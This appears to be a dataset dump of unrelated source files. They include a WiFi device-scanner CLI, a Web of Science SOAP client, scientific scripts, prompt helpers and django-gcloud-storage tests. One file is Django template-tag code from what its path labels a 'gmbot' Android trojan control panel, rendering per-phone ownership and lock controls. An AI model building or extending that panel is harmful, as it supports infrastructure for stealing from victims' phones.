import who_is_on_my_wifi
import subprocess
import argparse
import textwrap
import platform
import inspect
import socket
import getmac
import sys
import os
if platform.system() == "Windows":
import wmi
def contact():
print("""
>>>> Contact <<<<
My Gmail: <EMAIL>
My GitHub: https://github.com/tucnakomet1/
""")
def license():
lic_url = "https://raw.githubusercontent.com/tucnakomet1/Python-Who-Is-On-My-WiFi/master/LICENSE.txt"
lic = urllib.request.urlopen(lic_url)
lic = lic.read().decode("utf-8")
print(lic)
def help():
PURPLE, CYAN, DARKCYAN, BLUE, GREEN, YELLOW, RED, BOLD, UNDER, END = '\033[95m', '\033[96m', '\033[36m', '\033[94m', '\033[92m', '\033[93m', '\033[91m', '\033[1m', '\033[4m', '\033[0m'
if platform.system() == "Linux":
print(f"""
{UNDER}>>>> Welcome to wiom help page! What's wrong? <<<<{END}
--version | 1.3.0
{UNDER}{BOLD}About:{END}
Who-Is-On-My-WIFi module help you to find who is stealing your WiFI network, scan your WiFI and show you how many devices are currently connected.
{UNDER}{BOLD}Usage:{END}
{RED}>>> {YELLOW}import {CYAN}who_is_on_my_wifi{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}help(){END} {BOLD}{RED}# show this help page{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}contact(){END} {BOLD}{RED}# show contact{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}license(){END} {BOLD}{RED}# show license{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}who(n){END} {BOLD}{RED}# see who is on my wifi (int('n') is scanning time - optional; default is 10){END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}device(){END} {BOLD}{RED}# see information about your device
{UNDER}{BOLD}CONTACT:{END}
{UNDER}My Gmail:{END} <EMAIL>
{UNDER}My GitHub:{END} https://github.com/tucnakomet1/
{CYAN}who_is_on_my_wifi{END}.{GREEN}contact(){END}
{UNDER}{BOLD}License:{END}
MIT License
{UNDER}You can see{END} → {CYAN}who_is_on_my_wifi{END}.{GREEN}license(){RED}{END}
→ https://github.com/tucnakomet1/Python-Who-Is-On-My-WiFi/blob/master/LICENSE.txt
""")
else:
print(f"""
>>>> Welcome to help page! What's wrong? <<<<
--version | 1.3.0
About:
Who-Is-On-My-WIFi module help you to find who is stealing your WiFI network, scan your WiFI and show you how many devices are currently connected.
Usage:
>>> import who_is_on_my_wifi
>>> who_is_on_my_wifi.help() # show this help page
>>> who_is_on_my_wifi.contact() # show contact
>>> who_is_on_my_wifi.license() # show license
>>> who_is_on_my_wifi.who(n) # see who is on my wifi (int('n') is scanning time - optional; default is 10)
>>> who_is_on_my_wifi.device() # see information about your device
CONTACT:
My Gmail: <EMAIL>
My GitHub: https://github.com/tucnakomet1/
who_is_on_my_wifi.contact()
License:
MIT License
You can see → who_is_on_my_wifi.license()
→ https://github.com/tucnakomet1/Python-Who-Is-On-My-WiFi/blob/master/LICENSE.txt
""")
def main():
wrapper = textwrap.TextWrapper(width=70)
string = wrapper.fill(text = "Who-Is-On-My-WIFi")
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description=string, epilog=textwrap.dedent("""
Thank you!
↓ ↓ ↓ ↓
Visit my GitHub: https://github.com/tucnakomet1
"""))
"""subparsers = parser.add_subparsers(dest='command',
help='List of commands')"""
parser.add_argument(
'-v', '--version',
action='version',
version='%(prog)s 1.3.0',
help='show current version')
parser.add_argument(
'-c', '--contact',
action='store_true',
help='show contact')
parser.add_argument(
'-d', '--device',
action="store_true",
help='show information about your device')
parser.add_argument(
'-w', '--who',
action="store_true",
required=False,
help='show who is on your WiFi!')
parser.add_argument(
"-t", "--time",
type=int,
metavar="",
required=False,
default=10,
help="int supplement for '-w' command (scanning '-t' seconds)")
args = parser.parse_args()
if args.device:
dev = device()
print(f"""
PC Name: {dev[0]}
PC Product-Name: {dev[1]}
MAC Address: {dev[2]}
IP Address (host): {dev[3]}
IP Address: {dev[4]}
Public IP: {dev[5]}
PC HostName: {dev[6]}
WiFi Name: {dev[7]}
Gateway: {dev[8]}
DNS 1: {dev[9]}
DNS 2: {dev[10]}
Password: {<PASSWORD>]}
Security: {dev[12]}
Interface: {dev[13]}
Frequency: {dev[14]}
Signal: {dev[15]}
Channel: {dev[16]}
Country: {dev[17]}
Region: {dev[18]}
City: {dev[19]}
Zip Code: {dev[20]}
Latitude: {dev[21]}
Longitude: {dev[22]}
ISP: {dev[23]}
""")
if args.who:
if args.time:
WHO = who(args.time)
else:
WHO = who()
for j in range(0, len(WHO)):
comm = f"\n{WHO[j][0]} {WHO[j][1]}\n{WHO[j][2]} {WHO[j][3]}\n{WHO[j][4]} {WHO[j][5]}\n"
print(comm)
if args.contact:
contact()
if len(sys.argv) == 1:
parser.print_help()
if __name__ == "__main__":
main()
| 2.71875 | 3 |
wos/client.py | ConnectedSystems/wos | 0 | 12765108 | <filename>wos/client.py
#!/usr/bin/env python
__all__ = ['WosClient']
import suds as _suds
import functools as _functools
from base64 import b64encode as _b64encode
from collections import OrderedDict as _OrderedDict
from limit import limit as _limit
class WosClient():
"""Query the Web of Science.
You must provide user and password only to user premium WWS service.
with WosClient() as wos:
results = wos.search(...)"""
base_url = 'http://search.webofknowledge.com'
auth_url = base_url + '/esti/wokmws/ws/WOKMWSAuthenticate?wsdl'
search_url = base_url + '/esti/wokmws/ws/WokSearch?wsdl'
searchlite_url = base_url + '/esti/wokmws/ws/WokSearchLite?wsdl'
def __init__(self, user=None, password=<PASSWORD>, SID=None, close_on_exit=True,
lite=False, proxy=None, timeout=600, throttle=(2, 1)):
"""Create the SOAP clients. user and password for premium access."""
self._SID = SID
self._lite = lite
self._close_on_exit = close_on_exit
proxy = {'http': proxy} if proxy else None
options = {'proxy': proxy, 'timeout': timeout}
search_wsdl = self.searchlite_url if lite else self.search_url
self._auth = _suds.client.Client(self.auth_url, **options)
self._search = _suds.client.Client(search_wsdl, **options)
self._throttle_wait = _limit(*throttle)(lambda: True)
if user and password:
auth = '%s:%s' % (user, password)
auth = _b64encode(auth.encode('utf-8')).decode('utf-8')
headers = {'Authorization': ('Basic %s' % auth).strip()}
self._auth.set_options(headers=headers)
def __enter__(self):
"""Automatically connect when used with 'with' statements."""
self.connect()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Close connection after closing the 'with' statement."""
if self._close_on_exit:
self.close()
def __del__(self):
"""Close connection when deleting the object."""
if self._close_on_exit:
self.close()
def _api(fn):
"""API decorator for common tests (sessions open, etc.) and throttle
limitation (calls per second)."""
@_functools.wraps(fn)
def _fn(self, *args, **kwargs):
self._throttle_wait()
if not self._SID:
raise RuntimeError('Session closed. Invoke connect() before.')
return fn(self, *args, **kwargs)
return _fn
def _premium(fn):
"""Premium decorator for APIs that require premium access level."""
@_functools.wraps(fn)
def _fn(self, *args, **kwargs):
if self._lite:
raise RuntimeError('Premium API not available in lite access.')
return fn(self, *args, **kwargs)
return _fn
@staticmethod
def make_retrieveParameters(offset=1, count=100, name='RS', sort='D'):
"""Create retrieve parameters dictionary to be used with APIs.
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:name: Name of the field to order by. Use a two-character abbreviation
to specify the field ('AU': Author, 'CF': Conference Title,
'CG': Page, 'CW': Source, 'CV': Volume, 'LC': Local Times Cited,
'LD': Load Date, 'PG': Page, 'PY': Publication Year, 'RS':
Relevance, 'SO': Source, 'TC': Times Cited, 'VL': Volume)
:sort: Must be A (ascending) or D (descending). The sort parameter can
only be D for Relevance and TimesCited.
"""
return _OrderedDict([
('firstRecord', offset),
('count', count),
('sortField', _OrderedDict([('name', name), ('sort', sort)]))
])
def connect(self):
"""Authenticate to WOS and set the SID cookie."""
if not self._SID:
self._SID = self._auth.service.authenticate()
print('Authenticated (SID: %s)' % self._SID)
self._search.set_options(headers={'Cookie': 'SID="%s"' % self._SID})
self._auth.options.headers.update({'Cookie': 'SID="%s"' % self._SID})
return self._SID
def close(self):
"""The close operation loads the session if it is valid and then closes
it and releases the session seat. All the session data are deleted and
become invalid after the request is processed. The session ID can no
longer be used in subsequent requests."""
if self._SID:
self._auth.service.closeSession()
self._SID = None
@_api
def search(self, query, count=5, offset=1, editions=None,
symbolicTimeSpan=None, timeSpan=None, retrieveParameters=None):
"""The search operation submits a search query to the specified
database edition and retrieves data. This operation returns a query ID
that can be used in subsequent operations to retrieve more records.
:query: User query for requesting data. The query parser will return
errors for invalid queries
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:editions: List of editions to be searched. If None, user permissions
will be substituted.
Fields:
collection - Name of the collection
edition - Name of the edition
:symbolicTimeSpan: This element defines a range of load dates. The load
date is the date when a record was added to a
database. If symbolicTimeSpan is specified, the
timeSpan parameter must be omitted. If timeSpan and
symbolicTimeSpan are both omitted, then the maximum
publication date time span will be inferred from the
editions data.
Valid values:
'1week' - Specifies to use the end date as today and
the begin date as 1 week prior to today.
'2week' - Specifies to use the end date as today and
the begin date as 2 week prior to today.
'4week' - Specifies to use the end date as today and
the begin date as 4 week prior to today.
:timeSpan: This element defines specifies a range of publication dates.
If timeSpan is used, the symbolicTimeSpan parameter must be
omitted. If timeSpan and symbolicTimeSpan are both omitted,
then the maximum time span will be inferred from the
editions data.
Fields:
begin - Beginning date for this search. Format: YYYY-MM-DD
end - Ending date for this search. Format: YYYY-MM-DD
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.search(
queryParameters=_OrderedDict([
('databaseId', 'WOS'),
('userQuery', query),
('editions', editions),
('symbolicTimeSpan', symbolicTimeSpan),
('timeSpan', timeSpan),
('queryLanguage', 'en')
]),
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
def retrieve(self, queryId, count=100, offset=1, retrieveParameters=None):
"""The retrieve operation submits a query returned by a previous
search, citingArticles, relatedRecords, or retrieveById operation.
However, different retrieval parameters may be used to modify the
output. For example, if a search operation returns five records sorted
by times cited, a subsequent retrieve operation could run the same
search against the same database and edition but return 10 records
sorted by relevance.
This operation is also useful for overcoming the retrieval limit of 100
records per query. For example, a search operation may find 220
records, as revealed by the content of the recordsFound element, but it
returns only records 1-100. A subsequent retrieve operation could
return records 101-200 and a third retrieve operation the remaining 20.
:queryId: The query ID from a previous search
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.retrieve(
queryId=queryId,
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
def retrieveById(self, uid, count=100, offset=1, retrieveParameters=None):
"""The retrieveById operation returns records identified by unique
identifiers. The identifiers are specific to each database.
:uid: <NAME>ers unique record identifier
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.retrieveById(
databaseId='WOS',
uid=uid,
queryLanguage='en',
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
@_premium
def citedReferences(self, uid, count=100, offset=1,
retrieveParameters=None):
"""The citedReferences operation returns references cited by an article
identified by a unique identifier. You may specify only one identifier
per request.
:uid: <NAME> unique record identifier
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.citedReferences(
databaseId='WOS',
uid=uid,
queryLanguage='en',
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
@_premium
def citedReferencesRetrieve(self, queryId, count=100, offset=1,
retrieveParameters=None):
"""The citedReferencesRetrieve operation submits a query returned by a
previous citedReferences operation.
This operation is useful for overcoming the retrieval limit of 100
records per query. For example, a citedReferences operation may find
106 cited references, as revealed by the content of the recordsFound
element, but it returns only records 1-100. You could perform a
subsequent citedReferencesretrieve operation to obtain records 101-106.
:queryId: The query ID from a previous citedReferences operation
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.citedReferencesRetrieve(
queryId=queryId,
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
@_premium
def citingArticles(self, uid, count=100, offset=1, editions=None,
timeSpan=None, retrieveParameters=None):
"""The citingArticles operation finds citing articles for the article
specified by unique identifier. You may specify only one identifier per
request. Web of Science Core Collection (WOS) is the only valid
database for this operation.
:uid: A unique item identifier. It cannot be None or empty string.
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:editions: List of editions to be searched. If None, user permissions
will be substituted.
Fields:
collection - Name of the collection
edition - Name of the edition
:timeSpan: This element defines specifies a range of publication dates.
If timeSpan is null, then the maximum time span will be
inferred from the editions data.
Fields:
begin - Beginning date for this search. Format: YYYY-MM-DD
end - Ending date for this search. Format: YYYY-MM-DD
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.citingArticles(
databaseId='WOS',
uid=uid,
editions=editions,
timeSpan=timeSpan,
queryLanguage='en',
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
@_api
@_premium
def relatedRecords(self, uid, count=100, offset=1, editions=None,
timeSpan=None, retrieveParameters=None):
"""The relatedRecords operation finds Related Records for the article
specified by unique identifier. Related Records share cited references
with the specified record. The operation returns the parent record
along with the Related Records. The total number of Related Records for
the parent record is shown at the end of the response. Use the retrieve
parameter count to limit the number of Related Records returned.
:uid: A unique item identifier. It cannot be None or empty string.
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:editions: List of editions to be searched. If None, user permissions
will be substituted.
Fields:
collection - Name of the collection
edition - Name of the edition
:timeSpan: This element defines specifies a range of publication dates.
If timeSpan is null, then the maximum time span will be
inferred from the editions data.
Fields:
begin - Beginning date for this search. Format: YYYY-MM-DD
end - Ending date for this search. Format: YYYY-MM-DD
:retrieveParameters: Retrieve parameters. If omitted the result of
make_retrieveParameters(offset, count, 'RS', 'D')
is used.
"""
return self._search.service.relatedRecords(
databaseId='WOS',
uid=uid,
editions=editions,
timeSpan=timeSpan,
queryLanguage='en',
retrieveParameters=(retrieveParameters or
self.make_retrieveParameters(offset, count))
)
| 2.625 | 3 |
Cursos-Extras/Python/ex035.py | talessantos49/Primeiros_Passos | 0 | 12765109 | <gh_stars>0
n1 = float(input('Insira o primeiro valor desejado: '))
n2 = float(input('Insira o segundo valor desejado: '))
n3 = float(input('Insira o terceiro valor desejado: '))
if n1 > n2 != n3 and n1 > n3:
n4 = (n2 + n3)
if n4 > n1:
print('É possivel formar um triangulo com esses valores.')
else:
print('Não é possivel formar um triangulo com esses valores.')
if n2 > n1 != n3 and n2 > n3:
n4 = (n1 + n3)
if n4 > n2:
print('É possivel formar um triangulo com esses valores.')
else:
print('Esse triangulo não pode existir!!')
if n3 > n1 != n2 and n3 > n2:
n4 = (n1 + n2)
if n4 > n3:
print('A existencia desse triangulo é possivel, Vamos produzir !')
else:
print('A existencia desse triangulo não é possivel, tente novamente! ')
if n3 == n1 or n3 == n2 or n2 == n1:
print('Não é possivel formar um triangulo com esses valores.')
| 3.90625 | 4 |
code/4.1_make_index_multi.py | ceumicrodata/respect-trade-similarity | 1 | 12765110 | <reponame>ceumicrodata/respect-trade-similarity
import glob
import pandas as pd
from multiprocessing import Pool
file_list = glob.glob('../temp/index/data/index_??P_20??.csv')
#print(len(file_list))
def colnames(df):
try:
cols = ["DECLARANT_ISO","PARTNER_ISO","TCI"]
data = pd.read_csv(df)
data.columns=cols
data.to_csv(df)
except:
print("van meg 1 oszlop")
pool = Pool(processes=34)
pool.map(colnames,file_list)
pool.close()
pool.join()
#Select those which contain the export data
file_list_EXP = [db for db in file_list if "EXP" in db]
file_list_IMP = [db for db in file_list if "IMP" in db]
#print(file_list_IMP,file_list_EXP)
#print("IMP", len(file_list_IMP))
#print("EXP", len(file_list_EXP))
lista = [file_list_EXP,file_list_IMP]
def make_index(file_list):
data = pd.concat([pd.read_csv(f).rename(columns=lambda x: x.split('_')[0]).assign(FILE=f[-8:-4]) for f in file_list])
#data.columns = ["DESCLARANT","PARTNER","TCI"]
data = data.pivot_table(index=['DECLARANT','PARTNER'],columns='FILE')
data.to_csv('../temp/index/dirty/INDEX_'+file_list[0][-12:-8]+'.csv')
# new content
#print("new content")
"""
data = data.iloc[:,:19].drop(index=[0,1]).reset_index(drop=True).T.reset_index(drop=True).T
cols = ["DECLARANT","PARTNER"] + [ "TCI_"+str(x) for x in range(2001,2018)]
data.columns = cols
print("generate new df")
new_df = pd.DataFrame(list(product(data.DECLARANT.unique(), data.PARTNER.unique())), columns=["DECLARANT","PARTNER"])
new_df = new_df.loc[new_df["DECLARANT"]!=new_df["PARTNER"]]
print("merging")
merged = pd.merge(new_df,data, how="left",on=["DECLARANT","PARTNER"]) #.drop("Unnamed: 0",axis=1)
merged.to_csv("../output/TC_"+db[-14:])
"""
pool = Pool(processes=2)
pool.map(make_index,lista)
pool.close()
pool.join()
| 2.640625 | 3 |
functions/user.py | Katolus/functions | 4 | 12765111 | """Holds functions that ask a user for input"""
import warnings
from typing import List
import typer
from functions import logs
from functions import styles
from functions.config.models import FunctionConfig
from functions.constants import ConfigName
def ask(question: str, default: str = None, options: List[str] = None) -> str:
"""A string user prompt of the user in the console"""
if options:
question += f"{styles.yellow(' Options')}[{', '.join(options)}]"
return typer.prompt(
question,
default=default,
)
def confirm(question: str, default: bool = False) -> bool:
"""A boolean confirm prompt of the user in the console"""
return typer.confirm(question, default=default)
def confirm_abort(question: str) -> bool:
"""A boolean confirm prompt of the user in the console with a default abort action"""
return typer.confirm(question, abort=True)
def inform(msg: str, log: bool = True) -> None:
"""Informs a user with a message"""
if log:
logs.info(logs.remove_empty_lines_from_string(msg))
else:
typer.echo(msg)
def warn(msg: str, log: bool = True) -> None:
"""Warning a user with message"""
if log:
logs.warning(logs.remove_empty_lines_from_string(msg))
else:
warnings.warn(f"{styles.yellow('WARNING: ')}{msg}")
def fail(msg: str, log: bool = True) -> None:
"""Inform a user about a failed execution"""
if log:
logs.error(logs.remove_empty_lines_from_string(msg))
else:
warnings.warn(msg)
def prompt_to_save_config(config: FunctionConfig) -> None:
"""Asks the user if he wants to save the config in a function directory"""
store_config_file = confirm(
f"Do you want to store the configuration file ({ConfigName.BASE}) in the function's directory ({config.path})?",
default=True,
)
if store_config_file:
config.save()
| 3.671875 | 4 |
formulaic/__init__.py | jzaleski/simpleforms | 2 | 12765112 | __version__ = '0.0.1.dev1'
from formulaic.attributes import (
Attribute,
BooleanAttribute,
FloatAttribute,
IntegerAttribute,
LongAttribute,
StringAttribute,
TextAttribute,
UUIDAttribute,
)
from formulaic.formatters import Formatter
from formulaic.models import Model
from formulaic.persistors import (
Persistor,
SQLPersistor,
SQLitePersistor,
)
from formulaic.triggers import Trigger
from formulaic.types import Type
from formulaic.validators import Validator
| 1.515625 | 2 |
REGIR/Biochemical_applications/3_RNA_transcription (Fig.4)/3_RNA_sensitivity (Fig. 4D).py | Aurelien-Pelissier/REGIR | 0 | 12765113 | <gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from SALib.sample import saltelli
from SALib.analyze import sobol
#https://salib.readthedocs.io/en/latest/
from RNA_model import Gillespie_kinetics
N_simulations = 200
sensitivity_res = 64
recompute_sensitivity = False
class param_opt:
n_iteration = 100
current_iter = 0
use_already_computed_results = True
def main():
#2- sensitivity analysis
r_on = 1
r_off = 1
r_prod = 50
Sobol_sensitivity_analysis(r_on, r_off, r_prod)
def Sobol_sensitivity_analysis(r_on, r_off, r_prod):
"""
sensitivity of the coefficient of variation (CV) of mature mRNA
(SD divided by the mean) to small perturbations.
The CV is averaged over the cell cycle.
Sensitivity of a parameter r is defined formally as Sr = r/CV * dCV/dr,
meaning that a 1% change in the value of parameter r leads to Sr% change in CV
See https://en.wikipedia.org/wiki/Variance-based_sensitivity_analysis
"""
rmin = min(1,np.min([r_on, r_off, r_prod]))
Tend = 5/rmin
problem = {
'num_vars': 6,
'names': [r'$\lambda_{on}$', r'$\lambda_{off}$', r'$\lambda_{prod}$', r'$\alpha_{on}$', r'$\alpha_{off}$', r'$\alpha_{prod}$'],
'bounds': [[r_on*0.7, r_on*1.3],[r_off*0.7, r_off*1.3],[r_prod*0.7, r_prod*1.3],[2, 10],[2, 10],[2, 10]]
}
if recompute_sensitivity:
# Generate samples
param_values = saltelli.sample(problem, sensitivity_res, calc_second_order=False)
n_sim_tot = len(param_values)
def evaluate_Gillespie(values):
Y = np.empty((values.shape[0],4))
for i, X in enumerate(values):
print(' Simulation %s/%s ...' % (i+1,n_sim_tot))
param_list = dict()
param_list['r_deg'] = 1
param_list['r_on'] = X[0]
param_list['r_off'] = X[1]
param_list['r_prod'] = X[2]
param_list['alpha_on'] = X[3]
param_list['alpha_off'] = X[4]
param_list['alpha_prod'] = X[5]
param_list['Tend'] = Tend
print(' r_on: %.2f, r_off: %.2f, r_prod: %.2f, \n alpha_on: %.2f, alpha_off: %.2f, alpha_prod: %.2f' % (param_list['r_on'],param_list['r_off'],param_list['r_prod'],param_list['alpha_on'],param_list['alpha_off'],param_list['alpha_prod']))
mean, CV, Entropy, Fano, _ = Gillespie_kinetics(param_list, plot = False, N_simulations = N_simulations)
Y[i,:] = np.array([mean, CV, Entropy, Fano])
return Y
# Run model on all values
Y = evaluate_Gillespie(param_values)
np.save('sensitivity_analysis.npy',Y)
else:
Y = np.load('sensitivity_analysis.npy')
measures = ['mean','CV','Fano','Entropy']
for i in range(4):
# Perform analysis
Si = sobol.analyze(problem, Y[:,i], calc_second_order=False)
# Returns a dictionary with keys 'S1', 'S1_conf', 'ST', and 'ST_conf'
# (first and total-order indices with bootstrap confidence intervals)
print(' %s sensitivity analysis:' % measures[i])
print(' ', Si['S1'])
print(' ', Si['S1_conf'])
plt.figure(figsize = (5.5,4))
plt.errorbar(np.arange(problem['num_vars']), Si['S1'], yerr=Si['S1_conf'], fmt = 'o', color = 'black', capsize=5, elinewidth=2, markeredgewidth=2, markersize = 10, markerfacecolor = 'red')
plt.xticks(ticks = np.arange(problem['num_vars']), labels = problem['names'], rotation = 90, size = 19)
plt.axhline(y=0, color = 'black', linestyle = '--')
plt.xlim(-0.5,5.5)
plt.ylabel('Variance-based Sensitivity')
plt.show()
if __name__ == "__main__":
plt.rcParams.update({'font.size': 16})
main() | 2.953125 | 3 |
Trojan.Android.GM/gmbot/apps/smsg_r/smsapp/templatetags/mytags.py | 010001111/Vx-Suites | 2 | 12765114 | <gh_stars>1-10
from django import template
from django.conf import settings
from django.utils.safestring import mark_safe
from django_countries import conf
from django.template import Node
import pycountry
try:
from urllib import parse as urlparse
except ImportError:
import urlparse # Python 2
register = template.Library()
@register.simple_tag
def is_active(request, pattern):
import re
if re.search(pattern, request.path):
return 'active'
return ''
@register.simple_tag
def is_phone_available(request, phone):
"""
@type request: django.http.request.HttpRequest
@type phone: PhoneData
"""
if phone.owner_id is not None and request.user.id != phone.owner_id:
return " disabled='1'"
return ""
@register.simple_tag
def is_phone_owner_by_user(request, phone):
"""
@type request: django.http.request.HttpRequest
@type phone: PhoneData
"""
if request.user.id == phone.owner_id:
return ' checked="1"'
return ''
@register.simple_tag
def is_phone_locked(request, phone):
"""
@type request: django.http.request.HttpRequest
@type phone: PhoneData
"""
if phone.locked:
return ' checked="1"'
return ''
@register.filter
def country_code_to_name(code):
"""
Returns country name from its code
@param code: Country 2-letters code
@type code: str
@return: Country full name
@rtype: str
"""
try:
country = pycountry.countries.get(alpha2=code)
if country:
return country.name
except KeyError:
return code
return ""
@register.filter
def country_code_to_flag(code):
"""
Returns country flag HTML code from country's code
@param code: Country 2-letters code
@type code: str
@return: HTML code to render
@rtype: str
"""
# # todo: flags for unknown countries
fmt = conf.Settings.COUNTRIES_FLAG_URL
if code:
url = fmt.format(code_upper=code, code=code.lower())
uu = urlparse.urljoin(settings.STATIC_URL, url)
return mark_safe('<img src="{0}"/>'.format(uu))
return ""
class PrettyPrintNode(Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
from bs4 import BeautifulSoup
html = BeautifulSoup(self.nodelist.render(context))
return html.prettify()
@register.tag()
def pretty(parser, token):
nodelist = parser.parse(('endpretty',))
parser.delete_first_token()
return PrettyPrintNode(nodelist)
| 2.28125 | 2 |
common/security-features/subresource/referrer.py | FarooqAR/wpt | 1 | 12765115 | def main(request, response):
referrer = request.headers.get("referer", "")
response_headers = [("Content-Type", "text/javascript")];
return (200, response_headers, "window.referrer = '" + referrer + "'")
| 2.0625 | 2 |
work/apidoc/schema1.py | haizaar/crossbar-examples | 97 | 12765116 | <reponame>haizaar/crossbar-examples
from jsonschema import validate
from pprint import pprint
schema = {
"type" : "object",
"properties" : {
"price" : {"type" : "number"},
"name" : {"type" : "string"},
},
}
validate({"name" : "Eggs", "price" : 34.99}, schema)
#validate({"name" : "Eggs", "price" : "Invalid"}, schema)
import json
with open('api.json') as f:
schema = json.loads(f.read())
pprint(schema)
| 2.6875 | 3 |
tests/test_class.py | Superbalist/django-gcloud-storage | 0 | 12765117 | # coding=utf-8
from __future__ import unicode_literals
import datetime
import ssl
from tempfile import TemporaryFile
import gcloud.exceptions
import pytest
from django.core.exceptions import SuspiciousFileOperation
from django.utils import six
from django.utils.crypto import get_random_string
from django_gcloud_storage import safe_join, remove_prefix, GCloudFile
def urlopen(*args, **kwargs):
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
# Ignore SSL errors (won't work on Py3.3 but can be ignored there)
kwargs["context"] = ssl._create_unverified_context()
except AttributeError: # Py3.3
pass
return urlopen(*args, **kwargs)
@pytest.fixture
def storage(storage_object):
# Make sure there are no test files due to a previous test run
from django_gcloud_storage import prepare_name
for blob in storage_object.bucket.list_blobs():
storage_object.bucket.delete_blob(prepare_name(blob.name))
return storage_object
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestSafeJoin:
def test_should_join_urls(self):
assert safe_join("test", "index.html") == "test/index.html"
def test_should_not_break_on_slash_on_base(self):
assert safe_join("test/", "index.html") == "test/index.html"
assert safe_join("test///", "index.html") == "test/index.html"
def test_should_enforce_no_starting_slash_on_base(self):
assert safe_join("/test", "index.html") == "test/index.html"
assert safe_join("////test", "index.html") == "test/index.html"
def test_should_resolve_dots_to_absolute_path(self):
assert safe_join("test", "/test/../index.html") == "test/index.html"
def test_should_resolve_multiple_slashes(self):
assert safe_join("test", "/test//abc////index.html") == "test/test/abc/index.html"
assert safe_join("test///", "///test//abc////index.html") == "test/test/abc/index.html"
def test_should_not_allow_escaping_base_path(self):
with pytest.raises(SuspiciousFileOperation):
safe_join("test", "../index.html")
with pytest.raises(SuspiciousFileOperation):
safe_join("test", "/../index.html")
def test_should_work_with_bytes(self):
assert safe_join(b"test", "index.html") == "test/index.html"
assert safe_join("test", b"index.html") == "test/index.html"
assert safe_join(b"test", b"index.html") == "test/index.html"
def test_should_work_with_unicode_characters(self):
assert safe_join("test", "brathähnchen.html") == "test/brathähnchen.html"
def test_should_normalize_system_dependant_slashes(self):
assert safe_join("test", "windows\\slashes") == "test/windows/slashes"
assert safe_join("test", "windows\\/slashes") == "test/windows/slashes"
assert safe_join("windows\\", "slashes") == "windows/slashes"
def test_remove_prefix_function():
assert remove_prefix("/a/b/c/", "/a/") == "b/c/"
assert remove_prefix("/a/b/c/", "/b/") == "/a/b/c/"
# noinspection PyMethodMayBeStatic,PyTypeChecker
class TestGCloudFile:
TEST_CONTENT = "Brathähnchen".encode("utf8")
def test_should_be_able_to_read_and_write(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None)
f.open("w")
assert f.read() == (b"" if six.PY3 else "")
f.write(self.TEST_CONTENT)
f.seek(0)
assert f.read() == self.TEST_CONTENT
def test_small_temporary_files_should_not_be_rolled_over_to_disk(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None, maxsize=1000)
f.write("a".encode("utf8") * 1000)
assert not f._tmpfile._rolled
def test_large_temporary_files_should_be_rolled_over_to_disk(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None, maxsize=1000)
f.write("a".encode("utf8") * 1001)
assert f._tmpfile._rolled
def test_modified_files_should_be_marked_as_dirty(self, monkeypatch):
monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
f = GCloudFile(None)
f.write(self.TEST_CONTENT)
assert f._dirty
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestGCloudStorageClass:
TEST_FILE_NAME = "test_file_" + get_random_string(6)
TEST_FILE_NAME_UNICODE = "test_file_陰陽_" + get_random_string(6)
TEST_FILE_CONTENT = "Brathähnchen".encode("utf8")
def upload_test_file(self, storage, name, content):
if six.PY3 and isinstance(content, str):
content = content.encode("utf8")
